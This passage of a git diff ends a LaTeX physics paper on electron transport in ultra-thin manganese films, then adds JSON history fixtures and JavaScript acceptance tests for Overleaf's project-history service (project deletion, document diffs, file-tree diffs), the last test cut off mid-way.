Mn~\cite{ashcroft_1976}, +a thickness $t=2$~nm known to 20\% accuracy, together with the best-fit +value for $c$ into Eq.~(\ref{cFit}), we calculate the value $\bar{J} =$~320~$% +\pm$~93~K. Gao et al.~\cite{gao_2008} performed inelastic scanning tunneling +spectroscopy (ISTS) on thin Mn films and reported $\Delta$ in the range from +30 to 60~K and $\bar{J}=vk_F=$~3150~$\pm$~200~K. The agreement of energy gaps is +good; however our significantly lower value of $\bar{J}$ is probably due to the +high disorder in our ultra thin films. + +Since the temperature-dependent correction $B/\sqrt{\sinh (\Delta /T)}$ of +Eq.~\ref{sigmaWL} is small compared to the parameter $A$, we can write +$\sigma_{\square} \approx 1/R_0$ so that Eq.~\ref{sigmaWL} reduces to the +expression $A \approx 1/L_{00}R_0$. The logarithmic plot derived by taking the +logarithm of both sides of this approximation is shown in the inset of +Fig.~\ref{fig:parb}. The slope of -1 confirms the linear dependence of $A$ on +$1/R_0$ and the intercept of 5.01 (10$^{5.01}\approx $~102~k$\Omega$) is +within 20\% of the expected theoretical value $L_{00}=$~81~k$\Omega $, +for the normalization constant. Accordingly, the conductivity corrections in +Eq.~\ref{sigmaWL} are small compared to the zero temperature conductivity and +the normalization constant $L_{00}$ for the conductivity is close to the +expected theoretical value. + +Using Eq.~(\ref{WL}) and the obtained value for $a\approx $~28~k$\Omega $ we can +compare the dephasing length ($L_{\varphi }$) with the thickness ($t\approx $% +~2~nm) at 16~K. For the sample with $R_{0}=$~63903~$\Omega $ the ratio $% +L_{\varphi }/t\approx $~0.5 and for the sample with $R_{0}=$~17573~$\Omega $ +$L_{\varphi }/t\approx $~2. The latter estimate assumes no spin +polarization, while a full polarization would imply $L_{\varphi }/t\approx $% +~1. Thus $L_{\varphi }$ is smaller than or close to the thickness of the +film, which keeps the film in the three-dimensional regime for almost all +temperatures and disorder strengths considered. + +\begin{figure}[tbp] +\begin{center} +\includegraphics[width=9cm]{fig_2_16.eps} +\end{center} +\caption{Dependence of the fitting parameters $B$ and $A$ (inset) on +disorder $R_0$ for $\Delta=$~16~K. The fitting parameters are indicated for +each curve with the error in the least significant digit indicated in +parentheses.} +\label{fig:parb} +\end{figure} + +In conclusion, we have performed \textit{in situ} transport measurements on +ultra thin Mn films, systematically varying the disorder ($R_{0}=R_{xx}$($T=$% +~5~K)). The obtained data were analyzed within a weak localization theory in +3d generalized to strong disorder. In the temperature range considered +inelastic scattering off spin waves is found to be strong giving rise to a +dephasing length shorter than the film thickness, which places these systems +into the 3d regime. The obtained value for the spin wave gap was close to +the one measured by Gao et al.~\cite{gao_2008} using ISTS, while the +exchange energy was much smaller. + +This work has been supported by the NSF under Grant No 1305783 (AFH). +PW thanks A.\ M.\ \ Finkel'stein for useful discussions and acknowledges +partial support through the DFG research unit "Quantum phase transitions". + +\bibliographystyle{apsrev} +\bibliography{bibl} + +\end{document} diff --git a/services/project-history/test/acceptance/fixtures/chunks/0-3.json b/services/project-history/test/acceptance/fixtures/chunks/0-3.json new file mode 100644 index 0000000..51441cf --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/chunks/0-3.json @@ -0,0 +1,74 @@ +{ + "chunk": { + "history": { + "snapshot": { + "files": { + "bar.tex": { + "hash": "4f785a4c192155b240e3042b3a7388b47603f423", + "stringLength": 26 + }, + "main.tex": { + "hash": "f28571f561d198b87c24cc6a98b78e87b665e22d", + "stringLength": 20638, + "metadata": { + "main": true + } + } + } + }, + "changes": [ + { + "operations": [ + { + "pathname": "main.tex", + "textOperation": [ + 1912, + "Hello world", + 18726 + ] + } + ], + "timestamp": "2017-12-04T10:23:35.633Z", + "authors": [ + 31 + ] + }, + { + "operations": [ + { + "pathname": "bar.tex", + "newPathname": "foo.tex" + } + ], + "timestamp": "2017-12-04T10:27:26.874Z", + "authors": [ + 31 + ] + }, + { + "operations": [ + { + "pathname": "foo.tex", + "textOperation": [ + 26, + "\n\nFour five six" + ] + } + ], + "timestamp": "2017-12-04T10:28:33.724Z", + "authors": [ + 31 + ] + } + ] + }, + "startVersion": 0 + }, + "authors": [ + { + "id": 31, + "email": "james.allen@overleaf.com", + "name": "James" + } + ] +} \ No newline at end of file diff --git a/services/project-history/test/acceptance/fixtures/chunks/4-6.json b/services/project-history/test/acceptance/fixtures/chunks/4-6.json new file mode 100644 index 0000000..24040cf --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/chunks/4-6.json @@ -0,0 +1,74 @@ +{ + "chunk": { + "history": { + "snapshot": { + "files": { + "main.tex": { + "hash": "35c9bd86574d61dcadbce2fdd3d4a0684272c6ea", + "stringLength": 20649, + "metadata": { + "main": true + } + }, + "foo.tex": { + "hash": "c6654ea913979e13e22022653d284444f284a172", + "stringLength": 41 + } + } + }, + "changes": [ + { + "operations": [ + { + "pathname": "foo.tex", + "textOperation": [ + 41, + "\n\nSeven eight nince" + ] + } + ], + "timestamp": "2017-12-04T10:29:17.786Z", + "authors": [ + 31 + ] + }, + { + "operations": [ + { + "pathname": "foo.tex", + "textOperation": [ + 58, + -1, + 1 + ] + } + ], + "timestamp": "2017-12-04T10:29:22.905Z", + "authors": [ + 31 + ] + }, + { + "operations": [ + { + "pathname": "foo.tex", + "newPathname": "bar.tex" + } + ], + "timestamp": "2017-12-04T10:29:26.120Z", + "authors": [ + 31 + ] + } + ] + }, + "startVersion": 3 + }, + "authors": [ + { + "id": 31, + "email": "james.allen@overleaf.com", + "name": "James" + } + ] +} \ No newline at end of file diff --git a/services/project-history/test/acceptance/fixtures/chunks/7-8.json b/services/project-history/test/acceptance/fixtures/chunks/7-8.json new file mode 100644 index 0000000..4325abc --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/chunks/7-8.json @@ -0,0 +1,63 @@ +{ + "chunk": { + "history": { + "snapshot": { + "files": { + "main.tex": { + "hash": "35c9bd86574d61dcadbce2fdd3d4a0684272c6ea", + "stringLength": 20649, + "metadata": { + "main": true + } + }, + "bar.tex": { + "hash": "e13c315d53aaef3aa34550a86b09cff091ace220", + "stringLength": 59 + } + } + }, + "changes": [ + { + "operations": [ + { + "pathname": "main.tex", + "textOperation": [ + 1923, + " also updated", + 18726 + ] + } + ], + "timestamp": "2017-12-04T10:32:47.277Z", + "authors": [ + 31 + ] + }, + { + "operations": [ + { + "pathname": "bar.tex", + "textOperation": [ + 28, + -15, + 16 + ] + } + ], + "timestamp": "2017-12-04T10:32:52.877Z", + "v2Authors": [ + "5a5637efdac84e81b71014c4" + ] + } + ] + }, + "startVersion": 6 + }, + "authors": [ + { + "id": 31, + "email": "james.allen@overleaf.com", + "name": "James" + } + ] +} \ No newline at end of file diff --git a/services/project-history/test/acceptance/js/DeleteProjectTests.js b/services/project-history/test/acceptance/js/DeleteProjectTests.js new file mode 100644 index 0000000..dcda54a --- /dev/null +++ b/services/project-history/test/acceptance/js/DeleteProjectTests.js @@ -0,0 +1,83 @@ +import { expect } from 'chai' +import nock from 'nock' +import mongodb from 'mongodb-legacy' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') +const fixture = path => new URL(`../fixtures/${path}`, import.meta.url) + +describe('Deleting project', function () { + beforeEach(function (done) { + this.projectId = new ObjectId().toString() + this.historyId = new ObjectId().toString() + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: this.historyId } }, + }) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/latest/history`) + .replyWithFile(200, fixture('chunks/0-3.json')) + MockHistoryStore().delete(`/api/projects/${this.historyId}`).reply(204) + ProjectHistoryApp.ensureRunning(done) + }) + + describe('when the project has no pending updates', function (done) { + it('successfully deletes the project', function (done) { + ProjectHistoryClient.deleteProject(this.projectId, done) + }) + }) + + describe('when the project has pending updates', function (done) { + beforeEach(function (done) { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + { + pathname: '/main.tex', + docLines: 'hello', + doc: this.docId, + meta: { userId: this.userId, ts: new Date() }, + }, + err => { + if (err) { + return done(err) + } + ProjectHistoryClient.setFirstOpTimestamp( + this.projectId, + Date.now(), + err => { + if (err) { + return done(err) + } + ProjectHistoryClient.deleteProject(this.projectId, done) + } + ) + } + ) + }) + + it('clears pending updates', function (done) { + ProjectHistoryClient.getDump(this.projectId, (err, dump) => { + if (err) { + return done(err) + } + expect(dump.updates).to.deep.equal([]) + done() + }) + }) + + it('clears the first op timestamp', function (done) { + ProjectHistoryClient.getFirstOpTimestamp(this.projectId, (err, ts) => { + if (err) { + return done(err) + } + expect(ts).to.be.null + done() + }) + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/DiffTests.js b/services/project-history/test/acceptance/js/DiffTests.js new file mode 100644 index 0000000..b62e32d --- /dev/null +++ b/services/project-history/test/acceptance/js/DiffTests.js @@ -0,0 +1,415 @@ +import { expect } from 'chai' +import request from 'request' +import crypto from 'node:crypto' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +function createMockBlob(historyId, content) { + const sha = crypto.createHash('sha1').update(content).digest('hex') + MockHistoryStore() + .get(`/api/projects/${historyId}/blobs/${sha}`) + .reply(200, content) + .persist() + return sha +} + +describe('Diffs', function () { + beforeEach(function (done) { + ProjectHistoryApp.ensureRunning(error => { + if (error) { + throw error + } + + this.historyId = new ObjectId().toString() + this.projectId = new ObjectId().toString() + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: this.historyId, + }) + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: this.historyId } }, + }) + + ProjectHistoryClient.initializeProject(this.historyId, error => { + if (error) { + return done(error) + } + done() + }) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + it('should return a diff of the updates to a doc from a single chunk', function (done) { + this.blob = 'one two three five' + this.sha = createMockBlob(this.historyId, this.blob) + this.v2AuthorId = '123456789' + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: this.sha, + stringLength: this.blob.length, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [13, ' four', 5], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [4, -4, 15], + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [19, ' six'], + }, + ], + timestamp: '2017-12-04T10:29:26.120Z', + v2Authors: [this.v2AuthorId], + }, + ], + }, + startVersion: 3, + }, + authors: [31], + }) + + ProjectHistoryClient.getDiff( + this.projectId, + 'foo.tex', + 3, + 6, + (error, diff) => { + if (error) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + u: 'one ', + }, + { + d: 'two ', + meta: { + users: [31], + start_ts: 1512383362905, + end_ts: 1512383362905, + }, + }, + { + u: 'three', + }, + { + i: ' four', + meta: { + users: [31], + start_ts: 1512383357786, + end_ts: 1512383357786, + }, + }, + { + u: ' five', + }, + { + i: ' six', + meta: { + users: [this.v2AuthorId], + start_ts: 1512383366120, + end_ts: 1512383366120, + }, + }, + ], + }) + done() + } + ) + }) + + it('should return a diff of the updates to a doc across multiple chunks', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: createMockBlob(this.historyId, 'one two three five'), + stringLength: 'one three four five'.length, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [13, ' four', 5], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [4, -4, 15], + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: createMockBlob(this.historyId, 'one three four five'), + stringLength: 'one three four five'.length, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [19, ' six'], + }, + ], + timestamp: '2017-12-04T10:29:26.120Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [23, ' seven'], + }, + ], + timestamp: '2017-12-04T10:29:26.120Z', + authors: [31], + }, + ], + }, + startVersion: 5, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + ProjectHistoryClient.getDiff( + this.projectId, + 'foo.tex', + 4, + 6, + (error, diff) => { + if (error) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + u: 'one ', + }, + { + d: 'two ', + meta: { + users: [31], + start_ts: 1512383362905, + end_ts: 1512383362905, + }, + }, + { + u: 'three four five', + }, + { + i: ' six', + meta: { + users: [31], + start_ts: 1512383366120, + end_ts: 1512383366120, + }, + }, + ], + }) + done() + } + ) + }) + + it('should return a 404 when there are no changes for the file in the range', function (done) { + this.blob = 'one two three five' + this.sha = createMockBlob(this.historyId, this.blob) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: this.sha, + stringLength: this.blob.length, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [13, ' four', 5], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [31], + }) + + request.get( + { + url: `http://127.0.0.1:3054/project/${this.projectId}/diff`, + qs: { + pathname: 'not_here.tex', + from: 3, + to: 6, + }, + json: true, + }, + (error, res, body) => { + if (error) { + throw error + } + expect(res.statusCode).to.equal(404) + done() + } + ) + }) + + it('should return a binary flag with a diff of a binary file', function (done) { + this.blob = 'one two three five' + this.sha = createMockBlob(this.historyId, this.blob) + this.binaryBlob = Buffer.from([1, 2, 3, 4]) + this.binarySha = createMockBlob(this.historyId, this.binaryBlob) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'binary.tex': { + hash: this.binarySha, + byteLength: this.binaryBlob.length, // Indicates binary + }, + 'foo.tex': { + hash: this.sha, + stringLength: this.blob.length, // Indicates binary + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [13, ' four', 5], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [4, -4, 15], + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [19, ' six'], + }, + ], + timestamp: '2017-12-04T10:29:26.120Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + ProjectHistoryClient.getDiff( + this.projectId, + 'binary.tex', + 3, + 6, + (error, diff) => { + if (error) { + throw error + } + expect(diff).to.deep.equal({ + diff: { + binary: true, + }, + }) + done() + } + ) + }) +}) diff --git a/services/project-history/test/acceptance/js/DiscardingUpdatesTests.js b/services/project-history/test/acceptance/js/DiscardingUpdatesTests.js new file mode 100644 index 0000000..c5436af --- /dev/null +++ b/services/project-history/test/acceptance/js/DiscardingUpdatesTests.js @@ -0,0 +1,73 @@ +/* eslint-disable + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import async from 'async' +import sinon from 'sinon' +import { expect } from 'chai' +import Settings from '@overleaf/settings' +import assert from 'node:assert' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +describe('DiscardingUpdates', function () { + beforeEach(function (done) { + this.timestamp = new Date() + + return ProjectHistoryApp.ensureRunning(error => { + if (error != null) { + throw error + } + this.user_id = new ObjectId().toString() + this.project_id = new ObjectId().toString() + this.doc_id = new ObjectId().toString() + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: 0, + }) + MockWeb() + .get(`/project/${this.project_id}/details`) + .reply(200, { name: 'Test Project' }) + return ProjectHistoryClient.initializeProject(this.project_id, done) + }) + }) + + return it('should discard updates', function (done) { + return async.series( + [ + cb => { + const update = { + pathname: '/main.tex', + docLines: 'a\nb', + doc: this.doc_id, + meta: { user_id: this.user_id, ts: new Date() }, + } + return ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + return ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error != null) { + throw error + } + return done() + } + ) + }) +}) diff --git a/services/project-history/test/acceptance/js/FileTreeDiffTests.js b/services/project-history/test/acceptance/js/FileTreeDiffTests.js new file mode 100644 index 0000000..1b43dc1 --- /dev/null +++ b/services/project-history/test/acceptance/js/FileTreeDiffTests.js @@ -0,0 +1,880 @@ +/* eslint-disable + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import sinon from 'sinon' +import { expect } from 'chai' +import Settings from '@overleaf/settings' +import request from 'request' +import assert from 'node:assert' +import Path from 'node:path' +import crypto from 'node:crypto' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +import * as HistoryId from './helpers/HistoryId.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockFileStore = () => nock('http://127.0.0.1:3009') +const MockWeb = () => nock('http://127.0.0.1:3000') + +const sha = data => crypto.createHash('sha1').update(data).digest('hex') + +describe('FileTree Diffs', function () { + beforeEach(function (done) { + return ProjectHistoryApp.ensureRunning(error => { + if (error != null) { + throw error + } + + this.historyId = new ObjectId().toString() + this.projectId = new ObjectId().toString() + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: this.historyId, + }) + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: this.historyId } }, + }) + + return ProjectHistoryClient.initializeProject( + this.historyId, + (error, olProject) => { + if (error != null) { + throw error + } + return done() + } + ) + }) + }) + + afterEach(function () { + return nock.cleanAll() + }) + + it('should return a diff of the updates to a doc from a single chunk', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/7/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: sha('mock-sha-foo'), + stringLength: 42, + }, + 'renamed.tex': { + hash: sha('mock-sha-renamed'), + stringLength: 42, + }, + 'deleted.tex': { + hash: sha('mock-sha-deleted'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'renamed.tex', + newPathname: 'newName.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: ['lorem ipsum'], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'deleted.tex', + newPathname: '', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + { + operations: [ + { + file: { + hash: sha('new-sha'), + stringLength: 42, + }, + pathname: 'added.tex', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 7, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + pathname: 'foo.tex', + operation: 'edited', + }, + { + pathname: 'deleted.tex', + operation: 'removed', + deletedAtV: 5, + editable: true, + }, + { + newPathname: 'newName.tex', + pathname: 'renamed.tex', + operation: 'renamed', + editable: true, + }, + { + pathname: 'added.tex', + operation: 'added', + editable: true, + }, + ], + }) + return done() + } + ) + }) + + it('should return a diff of the updates to a doc across multiple chunks', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + // Updated in this chunk + hash: sha('mock-sha-foo'), + stringLength: 42, + }, + 'bar.tex': { + // Updated in the next chunk + hash: sha('mock-sha-bar'), + stringLength: 42, + }, + 'baz.tex': { + // Not updated + hash: sha('mock-sha-bar'), + stringLength: 42, + }, + 'renamed.tex': { + hash: sha('mock-sha-renamed'), + stringLength: 42, + }, + 'deleted.tex': { + hash: sha('mock-sha-deleted'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'renamed.tex', + newPathname: 'newName.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: ['lorem ipsum'], + }, + ], + timestamp: '2017-12-04T10:29:19.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'deleted.tex', + newPathname: '', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 2, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/7/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: sha('mock-sha-foo'), + stringLength: 42, + }, + 'baz.tex': { + hash: sha('mock-sha-bar'), + stringLength: 42, + }, + 'newName.tex': { + hash: sha('mock-sha-renamed'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + file: { + hash: sha('new-sha'), + stringLength: 42, + }, + pathname: 'added.tex', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'bar.tex', + textOperation: ['lorem ipsum'], + }, + ], + timestamp: '2017-12-04T10:29:23.786Z', + authors: [31], + }, + ], + }, + startVersion: 5, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 2, + 7, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + pathname: 'foo.tex', + operation: 'edited', + }, + { + pathname: 'bar.tex', + operation: 'edited', + }, + { + pathname: 'baz.tex', + editable: true, + }, + { + pathname: 'deleted.tex', + operation: 'removed', + deletedAtV: 4, + editable: true, + }, + { + newPathname: 'newName.tex', + pathname: 'renamed.tex', + operation: 'renamed', + editable: true, + }, + { + pathname: 'added.tex', + operation: 'added', + editable: true, + }, + ], + }) + return done() + } + ) + }) + + it('should return a diff that includes multiple renames', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'one.tex': { + hash: sha('mock-sha'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'one.tex', + newPathname: 'two.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'two.tex', + newPathname: 'three.tex', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + newPathname: 'three.tex', + pathname: 'one.tex', + operation: 'renamed', + editable: true, + }, + ], + }) + return done() + } + ) + }) + + it('should handle deleting then re-adding a file', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'one.tex': { + hash: sha('mock-sha'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'one.tex', + newPathname: '', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'one.tex', + file: { + hash: sha('mock-sha'), + }, + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + pathname: 'one.tex', + operation: 'added', + editable: null, + }, + ], + }) + return done() + } + ) + }) + + it('should handle deleting the renaming a file to the same place', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'one.tex': { + hash: sha('mock-sha-one'), + stringLength: 42, + }, + 'two.tex': { + hash: sha('mock-sha-two'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'one.tex', + newPathname: '', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'two.tex', + newPathname: 'one.tex', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + pathname: 'two.tex', + newPathname: 'one.tex', + operation: 'renamed', + editable: true, + }, + ], + }) + return done() + } + ) + }) + + it('should handle adding then renaming a file', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: {}, + }, + changes: [ + { + operations: [ + { + pathname: 'one.tex', + file: { + hash: sha('mock-sha'), + stringLength: 42, + }, + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'one.tex', + newPathname: 'two.tex', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + pathname: 'two.tex', + operation: 'added', + editable: true, + }, + ], + }) + return done() + } + ) + }) + + it('should return 422 with a chunk with an invalid rename', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: sha('mock-sha-foo'), + stringLength: 42, + }, + 'bar.tex': { + hash: sha('mock-sha-bar'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'foo.tex', + newPathname: 'bar.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + ], + }, + startVersion: 5, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 5, + 6, + (error, diff, statusCode) => { + if (error != null) { + throw error + } + expect(statusCode).to.equal(422) + return done() + } + ) + }) + + it('should return 200 with a chunk with an invalid add', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: sha('mock-sha-foo'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + file: { + hash: sha('new-sha'), + }, + pathname: 'foo.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + ], + }, + startVersion: 5, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 5, + 6, + (error, diff, statusCode) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + pathname: 'foo.tex', + operation: 'added', + editable: null, + }, + ], + }) + expect(statusCode).to.equal(200) + return done() + } + ) + }) + + it('should handle edits of missing/invalid files ', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: {}, + }, + changes: [ + { + operations: [ + { + pathname: 'new.tex', + textOperation: ['lorem ipsum'], + }, + 